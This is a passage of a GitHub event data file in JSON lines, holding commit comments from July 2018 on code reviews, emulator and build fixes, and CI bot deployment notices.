stuff.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/stefanofornari/BshConsole/commit/0d2b1e9da18126ea1aa2df392e498fedd7acb66f#commitcomment-29599904>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AACogvxBypH2cPQr6TPaRrcKS53hJGbnks5uDT5CgaJpZM4VDDhD>\n> .\n>\n"}},"created_at":"2018-07-05T15:19:11Z"}
{"id":"7923907393","type":"CommitCommentEvent","actor":{"login":"yanishoss"},"repo":{"name":"yanishoss/weather"},"payload":{"comment":{"id":29608269,"position":null,"line":null,"path":null,"commit_id":"960373a68c3144ccc07ac5d105fd2d57304fe06e","created_at":"2018-07-05T15:19:13Z","updated_at":"2018-07-05T15:19:13Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Fix the \"null\" that is printed when we fetch a new location not in the cache](https://trello.com/c/JtV1xs4x/20-fix-the-null-that-is-printed-when-we-fetch-a-new-location-not-in-the-cache)"}},"created_at":"2018-07-05T15:19:13Z"}
{"id":"7923907554","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29608270,"position":null,"line":null,"path":null,"commit_id":"397f3954092b37ee234312e44b81b0877034c6b4","created_at":"2018-07-05T15:19:15Z","updated_at":"2018-07-05T15:19:15Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 683](https://travis-ci.org/per1234/arduino-ci-script/builds/400480878) will be found at:\nhttps://github.com/per1234/CI-reports/tree/arduino-ci-script/build_00683"}},"created_at":"2018-07-05T15:19:15Z"}
{"id":"7923907652","type":"CommitCommentEvent","actor":{"login":"padmassun"},"repo":{"name":"canmet-energy/btap"},"payload":{"comment":{"id":29608271,"position":null,"line":null,"path":null,"commit_id":"f7b5b881955b9a6e742a24c0a5227d80ccf894f9","created_at":"2018-07-05T15:19:15Z","updated_at":"2018-07-05T15:19:15Z","author_association":"CONTRIBUTOR","body":"https://github.com/canmet-energy/btap_tasks/issues/104"}},"created_at":"2018-07-05T15:19:15Z"}
{"id":"7923909611","type":"CommitCommentEvent","actor":{"login":"yanishoss"},"repo":{"name":"yanishoss/weather"},"payload":{"comment":{"id":29608278,"position":null,"line":null,"path":null,"commit_id":"ff2163f2cf3413fb65f240a2d6a728199a5e989c","created_at":"2018-07-05T15:19:35Z","updated_at":"2018-07-05T15:19:35Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Lock the lockfile when reading from the cache](https://trello.com/c/Ry74CaXr/21-lock-the-lockfile-when-reading-from-the-cache)"}},"created_at":"2018-07-05T15:19:35Z"}
{"id":"7923909860","type":"CommitCommentEvent","actor":{"login":"DBOTW"},"repo":{"name":"TimothyPMann/xtrs"},"payload":{"comment":{"id":29608280,"position":null,"line":null,"path":null,"commit_id":"a7d50bf85aea2077c80f8c8c9912d6eea18e6dac","created_at":"2018-07-05T15:19:37Z","updated_at":"2018-07-05T15:19:37Z","author_association":"NONE","body":"Not sure if the following is correct to fix LDIR/LDDR in `z80.c`:\r\n```C\r\nstatic void do_ldir()\r\n{\r\n    do_ldi();\r\n    if(OVERFLOW_FLAG) {\r\n      REG_PC -= 2;\r\n      T_COUNT(21);\r\n    }\r\n}\r\n\r\nstatic void do_lddr()\r\n{\r\n    do_ldd();\r\n    if(OVERFLOW_FLAG) {\r\n      REG_PC -= 2;\r\n      T_COUNT(21);\r\n    }\r\n}\r\n```\r\n... but tested and seems to work ..."}},"created_at":"2018-07-05T15:19:37Z"}
{"id":"7923910995","type":"CommitCommentEvent","actor":{"login":"mcudev"},"repo":{"name":"trezor/trezor-core"},"payload":{"comment":{"id":29608283,"position":null,"line":null,"path":null,"commit_id":"aa1a0362168e5ea9715773c597958676352788d8","created_at":"2018-07-05T15:19:49Z","updated_at":"2018-07-05T15:19:49Z","author_association":"CONTRIBUTOR","body":"neat, now we don't have to keep replacing in SConscript.firmware:\r\n```\r\n-VENDORHEADER = 'embed/vendorheader/vendorheader_' + ('unsafe_signed_prod.bin' if ARGUMENTS.get('PRODUCTION', '0') == '0' else 'satoshilabs_signed_prod.bin')\r\n+VENDORHEADER = 'embed/vendorheader/vendorheader_' + ('unsafe_signed_dev.bin' if ARGUMENTS.get('PRODUCTION', '0') == '0' else 'satoshilabs_signed_prod.bin')\r\n```"}},"created_at":"2018-07-05T15:19:49Z"}
{"id":"7923920529","type":"CommitCommentEvent","actor":{"login":"jmayticketing"},"repo":{"name":"jmayticketing/projects"},"payload":{"comment":{"id":29608308,"position":null,"line":null,"path":null,"commit_id":"218732e29721a7782680bab64674e4ecfea16efe","created_at":"2018-07-05T15:21:22Z","updated_at":"2018-07-05T15:21:22Z","author_association":"OWNER","body":"Cleaned up the code for better viewing experience."}},"created_at":"2018-07-05T15:21:22Z"}
{"id":"7923926289","type":"CommitCommentEvent","actor":{"login":"sdroege"},"repo":{"name":"gtk-rs/pango"},"payload":{"comment":{"id":29608314,"position":29,"line":23,"path":"src/item.rs","commit_id":"38e63b5baceb256fd7e31772ca9df20cb4630acc","created_at":"2018-07-05T15:22:21Z","updated_at":"2018-07-05T15:22:21Z","author_association":"MEMBER","body":"Remove the `'a` here and then we're fine. The inferred lifetimes are exactly what we want here"}},"created_at":"2018-07-05T15:22:21Z"}
{"id":"7923930683","type":"CommitCommentEvent","actor":{"login":"ranaparamveer"},"repo":{"name":"jgilfelt/android-sqlite-asset-helper"},"payload":{"comment":{"id":29608323,"position":null,"line":null,"path":null,"commit_id":"74a9b0d68aeb1bb0b9778c5598e37da573919ce1","created_at":"2018-07-05T15:23:04Z","updated_at":"2018-07-05T15:23:04Z","author_association":"NONE","body":"Please check:\r\n\r\n[closing the database on force upgrade](https://github.com/ranaparamveer/android-sqlite-asset-helper/blob/2c4d07fd865cda1eabdcb08d51cbb63b633238cc/library/src/main/java/com/readystatesoftware/sqliteasset/SQLiteAssetHelper.java#L184)\r\n\r\n[super.close](https://github.com/ranaparamveer/android-sqlite-asset-helper/blob/2c4d07fd865cda1eabdcb08d51cbb63b633238cc/library/src/main/java/com/readystatesoftware/sqliteasset/SQLiteAssetHelper.java#L298)"}},"created_at":"2018-07-05T15:23:04Z"}
{"id":"7923934588","type":"CommitCommentEvent","actor":{"login":"fsantanna"},"repo":{"name":"AnnyCaroline/ceu-maker-gsoc"},"payload":{"comment":{"id":29608336,"position":5,"line":55,"path":"SelectDevice/SelectDevice/Form1.cs","commit_id":"cd832c2c76b59447e0f22e34ea8cfa9323131ae4","created_at":"2018-07-05T15:23:42Z","updated_at":"2018-07-05T15:23:42Z","author_association":"NONE","body":"Maybe the problem it didn't work is related to this absolute path (\"Anny\")?\r\nIs it possible to be relative to `ceu-maker/`"}},"created_at":"2018-07-05T15:23:42Z"}
{"id":"7923943811","type":"CommitCommentEvent","actor":{"login":"Jesus89"},"repo":{"name":"CartoDB/carto.js"},"payload":{"comment":{"id":29608359,"position":5,"line":307,"path":"test/spec/vis/vis.spec.js","commit_id":"b5883a4bc03e88a7cbd424946b57950b06738dd5","created_at":"2018-07-05T15:25:14Z","updated_at":"2018-07-05T15:25:14Z","author_association":"MEMBER","body":":confused: "}},"created_at":"2018-07-05T15:25:14Z"}
{"id":"7923944292","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29608360,"position":null,"line":null,"path":null,"commit_id":"8a6a92031d3bf7bc8d71b0fb7dbca764abc49fdb","created_at":"2018-07-05T15:25:18Z","updated_at":"2018-07-05T15:25:18Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T15:25:18Z"}
{"id":"7923963985","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29608400,"position":null,"line":null,"path":null,"commit_id":"b059a76de73640830efba5543a84145a8313aedd","created_at":"2018-07-05T15:28:32Z","updated_at":"2018-07-05T15:28:32Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-713](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-713).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-713-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-05T15:28:32Z"}
{"id":"7923964136","type":"CommitCommentEvent","actor":{"login":"garyskeete"},"repo":{"name":"garyskeete/linux-modder.github.io"},"payload":{"comment":{"id":29608401,"position":null,"line":null,"path":null,"commit_id":"3bb4a21ca161c61c68702d47bc5c236f7076681c","created_at":"2018-07-05T15:28:34Z","updated_at":"2018-07-05T15:28:34Z","author_association":"OWNER","body":"Starlight and photon computers as memory storage devices -Nokia"}},"created_at":"2018-07-05T15:28:34Z"}
{"id":"7923967349","type":"CommitCommentEvent","actor":{"login":"GuillaumeGomez"},"repo":{"name":"gtk-rs/pango"},"payload":{"comment":{"id":29608407,"position":29,"line":23,"path":"src/item.rs","commit_id":"38e63b5baceb256fd7e31772ca9df20cb4630acc","created_at":"2018-07-05T15:29:06Z","updated_at":"2018-07-05T15:29:06Z","author_association":"MEMBER","body":"Ah right, I'm still not up to date about new syntaxes..."}},"created_at":"2018-07-05T15:29:06Z"}
{"id":"7923968654","type":"CommitCommentEvent","actor":{"login":"gabrielredrado"},"repo":{"name":"gabrielredrado/sample-cloud-native-toolchain-tutorial-20180705013744744"},"payload":{"comment":{"id":29608416,"position":null,"line":null,"path":null,"commit_id":"5e1f32e6b4970807320aabe314725d0de348e078","created_at":"2018-07-05T15:29:19Z","updated_at":"2018-07-05T15:29:19Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/8dc3e052-1319-416f-8f2b-7358155ac08c?env_id=ibm%3Ayp%3Aus-south \"cloud-native-toolchain-tutorial-20180705013744744\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/37fda7be-6e5c-4e4a-811b-6f111e6bda43?env_id=ibm%3Ayp%3Aus-south \"sample-cloud-native-toolchain-tutorial-20180705013744744\") deployed [sample-cloud-native-toolchain-tutorial-20180705013744744](https://github.com/gabrielredrado/sample-cloud-native-toolchain-tutorial-20180705013744744/releases/tag/deploy-ibm-yp-us-south-redrado-ar.ibm.com-prod-20180705-152918 \"deploy-ibm-yp-us-south-redrado-ar.ibm.com-prod-20180705-152918\") to [prod](https://console.bluemix.net/apps/da8d3079-4c44-4e07-93bd-f5f6111fe962?env_id=ibm:yp:us-south \"ibm:yp:us-south:redrado@ar.ibm.com:prod\"), including this commit"}},"created_at":"2018-07-05T15:29:19Z"}
{"id":"7923968888","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29608417,"position":null,"line":null,"path":null,"commit_id":"93a0183c3b07e184676c2c1539fba6a83e9271d5","created_at":"2018-07-05T15:29:21Z","updated_at":"2018-07-05T15:29:21Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-05T15:29:21Z"}
{"id":"7923971158","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29608422,"position":null,"line":null,"path":null,"commit_id":"51526481e956a3c10f1b26fc068bc254391e6e50","created_at":"2018-07-05T15:29:42Z","updated_at":"2018-07-05T15:29:42Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#pr-125](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#pr-125).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-125-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-05T15:29:42Z"}
{"id":"7923972246","type":"CommitCommentEvent","actor":{"login":"rjimenezda"},"repo":{"name":"CartoDB/carto.js"},"payload":{"comment":{"id":29608426,"position":5,"line":307,"path":"test/spec/vis/vis.spec.js","commit_id":"b5883a4bc03e88a7cbd424946b57950b06738dd5","created_at":"2018-07-05T15:29:52Z","updated_at":"2018-07-05T15:29:52Z","author_association":"CONTRIBUTOR","body":"Oh all green without pushing that one. Must be an ~occasional~ integration error "}},"created_at":"2018-07-05T15:29:52Z"}
{"id":"7923976402","type":"CommitCommentEvent","actor":{"login":"dhMuse"},"repo":{"name":"pathwaysmedical/frasernw"},"payload":{"comment":{"id":29608438,"position":null,"line":null,"path":null,"commit_id":"c8475d1f28438676a9f0bf2721124af47d5027e3","created_at":"2018-07-05T15:30:33Z","updated_at":"2018-07-05T15:30:33Z","author_association":"COLLABORATOR","body":"🥇 "}},"created_at":"2018-07-05T15:30:33Z"}
{"id":"7923977430","type":"CommitCommentEvent","actor":{"login":"Saederup92"},"repo":{"name":"Terminal/terminal.ink"},"payload":{"comment":{"id":29608439,"position":null,"line":null,"path":null,"commit_id":"604a49720a24e32da1ebf52304fbc423724e379b","created_at":"2018-07-05T15:30:43Z","updated_at":"2018-07-05T15:30:43Z","author_association":"NONE","body":"Press f to pay respects"}},"created_at":"2018-07-05T15:30:43Z"}
{"id":"7923978244","type":"CommitCommentEvent","actor":{"login":"mpicard"},"repo":{"name":"starkandwayne/concourse-tutorial"},"payload":{"comment":{"id":29608441,"position":null,"line":null,"path":null,"commit_id":"498309c6d817260a7be4361089c79cd4594aea53","created_at":"2018-07-05T15:30:51Z","updated_at":"2018-07-05T15:30:51Z","author_association":"NONE","body":"only the devil uses underscore for file names"}},"created_at":"2018-07-05T15:30:51Z"}
{"id":"7924002219","type":"CommitCommentEvent","actor":{"login":"stefanofornari"},"repo":{"name":"stefanofornari/BshConsole"},"payload":{"comment":{"id":29608493,"position":166,"line":166,"path":"src/main/java/bsh/BshConsoleInterpreter.java","commit_id":"0d2b1e9da18126ea1aa2df392e498fedd7acb66f","created_at":"2018-07-05T15:34:47Z","updated_at":"2018-07-05T15:34:47Z","author_association":"OWNER","body":"one more:\n\nline 452: it is important that in interactive mode you check that eof is\nfalse to proceed with node evaluation. the logic is that if the user\nstopped the stream there is no need to eval the node. if you miss that\ncheck, you will get a parse exception unless the imput was complete.\n\nHTH\n\nSte\n\nOn Thu, Jul 5, 2018 at 5:19 PM, Stefano Fornari <stefano.fornari@gmail.com>\nwrote:\n\n> Hi @nickl- I am trying to merge the changes above, please see my comments\n> below:\n>\n> - line 485: if ( !interactive || !e.getMessage().contains(\"<EOF>\") )\n> don't we have already a more reliable way to know if EOF has been reached\n> being eof true? I would not recommend to relay on the message.\n>\n> - line 987:  private boolean isEOF() throws ParseException {\n>         return parser.Line();\n>     }\n> to be honest I find more understandble Line(). any particular reason for\n> the change?\n>\n> Hope this helps.\n>\n>\n> Ste\n>\n> On Thu, Jul 5, 2018 at 12:14 AM, Nick Lombard <notifications@github.com>\n> wrote:\n>\n>> All removed this... the java docs state we should not be yielding and the\n>> with or without the flushing the results appear the same so I figure this\n>> is again some java 1.1 1.2 legacy stuff.\n>>\n>> —\n>> You are receiving this because you authored the thread.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/stefanofornari/BshConsole/commit/0d2b1e9da18126ea1aa2df392e498fedd7acb66f#commitcomment-29599904>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/AACogvxBypH2cPQr6TPaRrcKS53hJGbnks5uDT5CgaJpZM4VDDhD>\n>> .\n>>\n>\n>\n"}},"created_at":"2018-07-05T15:34:47Z"}
{"id":"7924007849","type":"CommitCommentEvent","actor":{"login":"koehnlein"},"repo":{"name":"ochorocho/joro-typo3reversedeployment"},"payload":{"comment":{"id":29608503,"position":4,"line":6,"path":"composer.json","commit_id":"44890e6bad4403e3900ca478914c94831408d184","created_at":"2018-07-05T15:35:44Z","updated_at":"2018-07-05T15:35:44Z","author_association":"CONTRIBUTOR","body":"I have no idea, how that PHAR thing works. But if it solves my problem, it would be great."}},"created_at":"2018-07-05T15:35:44Z"}
{"id":"7924014810","type":"CommitCommentEvent","actor":{"login":"judovana"},"repo":{"name":"apache/mina-sshd"},"payload":{"comment":{"id":29608519,"position":14,"line":107,"path":"sshd-core/src/main/java/org/apache/sshd/common/forward/TcpipClientChannel.java","commit_id":"f2a60cd07ed17325a64f6a4e806273f81f131f2e","created_at":"2018-07-05T15:36:55Z","updated_at":"2018-07-05T15:36:55Z","author_association":"NONE","body":"It is not picky.   Brackets are part of good set of java habits. Thank you for keeping Mina alive and improving."}},"created_at":"2018-07-05T15:36:55Z"}
{"id":"7924015461","type":"CommitCommentEvent","actor":{"login":"danttang1987"},"repo":{"name":"linyue515/mysql-master-ha"},"payload":{"comment":{"id":29608520,"position":null,"line":null,"path":null,"commit_id":"21f717636671c43e39537552c114a246b6cebd47","created_at":"2018-07-05T15:37:02Z","updated_at":"2018-07-05T15:37:02Z","author_association":"NONE","body":"dsfaf"}},"created_at":"2018-07-05T15:37:02Z"}
{"id":"7924024799","type":"CommitCommentEvent","actor":{"login":"roryk"},"repo":{"name":"syl20bnr/spacemacs"},"payload":{"comment":{"id":29608533,"position":null,"line":null,"path":null,"commit_id":"7c9f612c4f4a1eda7c8a11194ff2bce21ca53ca0","created_at":"2018-07-05T15:38:37Z","updated_at":"2018-07-05T15:38:37Z","author_association":"CONTRIBUTOR","body":"It also might be nice to avoid sorting entries with duplicate keys; the sorting messes up the order they are applied if there are multiple instances they can get applied in the wrong order. Sorry for just comments and no code contribution."}},"created_at":"2018-07-05T15:38:37Z"}
{"id":"7924028910","type":"CommitCommentEvent","actor":{"login":"EmmaNguyen"},"repo":{"name":"EmmaNguyen/feature_adversarial_with_topology_signatures"},"payload":{"comment":{"id":29608537,"position":null,"line":null,"path":null,"commit_id":"eaba0b21deb400cd5dfc8fac80f061b4d1253337","created_at":"2018-07-05T15:39:21Z","updated_at":"2018-07-05T15:39:21Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Write a utility function to check Torch](https://trello.com/c/6kuyQ3kd/31-write-a-utility-function-to-check-torch)"}},"created_at":"2018-07-05T15:39:21Z"}
{"id":"7924031665","type":"CommitCommentEvent","actor":{"login":"EmmaNguyen"},"repo":{"name":"EmmaNguyen/feature_adversarial_with_topology_signatures"},"payload":{"comment":{"id":29608544,"position":null,"line":null,"path":null,"commit_id":"8cc75b2f742c982e08e37a2b9e6c9fd71a8ff97a","created_at":"2018-07-05T15:39:49Z","updated_at":"2018-07-05T15:39:49Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Write a utility function to check Torch](https://trello.com/c/6kuyQ3kd/31-write-a-utility-function-to-check-torch)"}},"created_at":"2018-07-05T15:39:49Z"}
{"id":"7924039586","type":"CommitCommentEvent","actor":{"login":"gromakovsky"},"repo":{"name":"serokell/ariadne"},"payload":{"comment":{"id":29608554,"position":43,"line":44,"path":"ariadne/src/Ariadne/Wallet/Face.hs","commit_id":"2874d25e31dadbbebcb65b23732397783aa05a18","created_at":"2018-07-05T15:41:11Z","updated_at":"2018-07-05T15:41:11Z","author_association":"MEMBER","body":"If we didn't have to deal with derivation paths, I wouldn't mind using `Word32`. However, in our code I associate `Word32` with derivation indices.\r\n\r\nBtw, `Word` does provide guarantees on its size, it has at least 29 bits IIRC, which is perfectly fine for UI indices. Moreover, using `Word` should be faster, AFAIU (on 64-bit systems)."}},"created_at":"2018-07-05T15:41:11Z"}
{"id":"7924040977","type":"CommitCommentEvent","actor":{"login":"wmwv"},"repo":{"name":"LSSTDESC/gcr-catalogs"},"payload":{"comment":{"id":29608556,"position":23,"line":142,"path":"GCRCatalogs/dc2_coadd.py","commit_id":"16a914e3f04c6ce04ad60499f05e6919baf07b6e","created_at":"2018-07-05T15:41:26Z","updated_at":"2018-07-05T15:41:26Z","author_association":"NONE","body":"I think that these should be to `{}_psFlux' -> '{}_slot_PsfFlux_flux`\r\nModelFlux is something different."}},"created_at":"2018-07-05T15:41:26Z"}
{"id":"7924042409","type":"CommitCommentEvent","actor":{"login":"ShaopengLiu1"},"repo":{"name":"ShaopengLiu1/ATAC-seq_QC_analysis"},"payload":{"comment":{"id":29608558,"position":null,"line":null,"path":null,"commit_id":"ce128f70e9098b7f4bb012d906319a58045f709b","created_at":"2018-07-05T15:41:41Z","updated_at":"2018-07-05T15:41:41Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-05T15:41:41Z"}
{"id":"7924042823","type":"CommitCommentEvent","actor":{"login":"edolstra"},"repo":{"name":"NixOS/nix"},"payload":{"comment":{"id":29608560,"position":null,"line":null,"path":null,"commit_id":"a92ed973e569324b55cddb128f6f638f3ea1985c","created_at":"2018-07-05T15:41:46Z","updated_at":"2018-07-05T15:41:46Z","author_association":"MEMBER","body":"That would be nice, but it would probably have a slight (?) performance impact."}},"created_at":"2018-07-05T15:41:46Z"}
{"id":"7924043221","type":"CommitCommentEvent","actor":{"login":"gromakovsky"},"repo":{"name":"serokell/ariadne"},"payload":{"comment":{"id":29608562,"position":43,"line":44,"path":"ariadne/src/Ariadne/Wallet/Face.hs","commit_id":"2874d25e31dadbbebcb65b23732397783aa05a18","created_at":"2018-07-05T15:41:50Z","updated_at":"2018-07-05T15:41:50Z","author_association":"MEMBER","body":"`newtype` or just `type` is better, yes."}},"created_at":"2018-07-05T15:41:50Z"}
{"id":"7924049608","type":"CommitCommentEvent","actor":{"login":"darix"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29608578,"position":30,"line":249,"path":"lib/email/receiver.rb","commit_id":"28dd7fb56231938141635cc08285368c8239bd6a","created_at":"2018-07-05T15:42:58Z","updated_at":"2018-07-05T15:42:58Z","author_association":"CONTRIBUTOR","body":"that's why I thought a site setting like\r\n\r\n```\r\nemail_in_spam_header:\r\n  type: enum\r\n  default: 'none'\r\n  choices:\r\n    X-Spam-Flag: /YES/i\r\n    X-Spam-Status: /^YES, /i\r\n```\r\n\r\nWould have been better. with the current code implementation, I am not even sure why we need the list in site settings."}},"created_at":"2018-07-05T15:42:58Z"}
{"id":"7924052930","type":"CommitCommentEvent","actor":{"login":"smed79"},"repo":{"name":"easylist/easylist"},"payload":{"comment":{"id":29608583,"position":null,"line":null,"path":null,"commit_id":"0fee65a485bd0dc5e12a2e826abe954addff3b8c","created_at":"2018-07-05T15:43:34Z","updated_at":"2018-07-05T15:43:34Z","author_association":"CONTRIBUTOR","body":"Does this filter still necessary?"}},"created_at":"2018-07-05T15:43:34Z"}
{"id":"7924055021","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29608587,"position":null,"line":null,"path":null,"commit_id":"44c8b31b0168a90797702c550b6b675c3db2d28e","created_at":"2018-07-05T15:43:56Z","updated_at":"2018-07-05T15:43:56Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [docker](https://docker-static-docs.pantheonsite.io/docs) Multidev environment:\n- [scripts/watch.php](https://github.com/pantheon-systems/documentation/commit/44c8b31b0168a90797702c550b6b675c3db2d28e/scripts/watch.php)\n"}},"created_at":"2018-07-05T15:43:56Z"}
{"id":"7924060249","type":"CommitCommentEvent","actor":{"login":"ajefts"},"repo":{"name":"topcoder-platform/admin-app"},"payload":{"comment":{"id":29608601,"position":null,"line":null,"path":null,"commit_id":"92b237b782d468cc0d4c558df7e6bef49f335117","created_at":"2018-07-05T15:44:49Z","updated_at":"2018-07-05T15:44:49Z","author_association":"MEMBER","body":"@huangqun Did we have remaining dev to do on this one?  When we try it, we're getting this error:\r\n\r\n![image](https://user-images.githubusercontent.com/3812270/42333457-c5ec1b7a-8048-11e8-92fc-89272d5ee1ae.png)\r\n\r\n\r\nMaybe we're not sending the correct json format to the api?\r\n\r\ncc: @RiteshTC "}},"created_at":"2018-07-05T15:44:49Z"}
{"id":"7924066471","type":"CommitCommentEvent","actor":{"login":"NateWr"},"repo":{"name":"Vitaliy-1/pkp-lib"},"payload":{"comment":{"id":29608620,"position":4,"line":112,"path":"locale/en_US/user.xml","commit_id":"36363e57ed26f74623cd7062304406bf683b5dfc","created_at":"2018-07-05T15:45:54Z","updated_at":"2018-07-05T15:45:54Z","author_association":"NONE","body":"This should be something like:\r\n\r\n> Yes, I agree to have my data collected and stored according to the [privacy statement](#) of {$contextName}."}},"created_at":"2018-07-05T15:45:54Z"}
{"id":"7924066813","type":"CommitCommentEvent","actor":{"login":"martynkin"},"repo":{"name":"martynkin/DLLCopier"},"payload":{"comment":{"id":29608621,"position":null,"line":null,"path":null,"commit_id":"2c50a3461fe12fe948454360bda2728bd7d2d5cd","created_at":"2018-07-05T15:45:58Z","updated_at":"2018-07-05T15:45:58Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://109.195.189.78:40103/ui#review:id=31)"}},"created_at":"2018-07-05T15:45:58Z"}
{"id":"7924069358","type":"CommitCommentEvent","actor":{"login":"volth"},"repo":{"name":"NixOS/nix"},"payload":{"comment":{"id":29608623,"position":null,"line":null,"path":null,"commit_id":"a92ed973e569324b55cddb128f6f638f3ea1985c","created_at":"2018-07-05T15:46:24Z","updated_at":"2018-07-05T15:46:24Z","author_association":"CONTRIBUTOR","body":"Number of arithmetic operations on ```NixInt``` is small.\r\nEven number of integer ```Value```s is vary small compared to strings/lists/sets"}},"created_at":"2018-07-05T15:46:24Z"}
{"id":"7924074669","type":"CommitCommentEvent","actor":{"login":"meijeru"},"repo":{"name":"red/red"},"payload":{"comment":{"id":29608633,"position":null,"line":null,"path":null,"commit_id":"963ec55a6bab860f8b259246f794bde6ea0172be","created_at":"2018-07-05T15:47:21Z","updated_at":"2018-07-05T15:47:21Z","author_association":"NONE","body":"Methodological comment: I notice that `%usage.txt` is included *verbatim* in `%README.md`. In order to avoid discrepancies and save work, it would be nice if the readme file could #include the usage file if you see what I mean."}},"created_at":"2018-07-05T15:47:21Z"}
{"id":"7924076656","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29608640,"position":null,"line":null,"path":null,"commit_id":"b059a76de73640830efba5543a84145a8313aedd","created_at":"2018-07-05T15:47:42Z","updated_at":"2018-07-05T15:47:42Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-716](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-716).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-716-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-05T15:47:42Z"}
{"id":"7924077865","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29608642,"position":null,"line":null,"path":null,"commit_id":"54030eae155d0247ff7bf62bd74a49e22371eb83","created_at":"2018-07-05T15:47:54Z","updated_at":"2018-07-05T15:47:54Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-718](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-718).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-718-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-05T15:47:54Z"}
{"id":"7924078889","type":"CommitCommentEvent","actor":{"login":"Masaya-Motoda"},"repo":{"name":"elmas3/mao-seminar"},"payload":{"comment":{"id":29608646,"position":null,"line":null,"path":null,"commit_id":"258b4af23899081c2486f6f114b2500f7cc2aa87","created_at":"2018-07-05T15:48:06Z","updated_at":"2018-07-05T15:48:06Z","author_association":"NONE","body":"### すみません、間違えました"}},"created_at":"2018-07-05T15:48:06Z"}
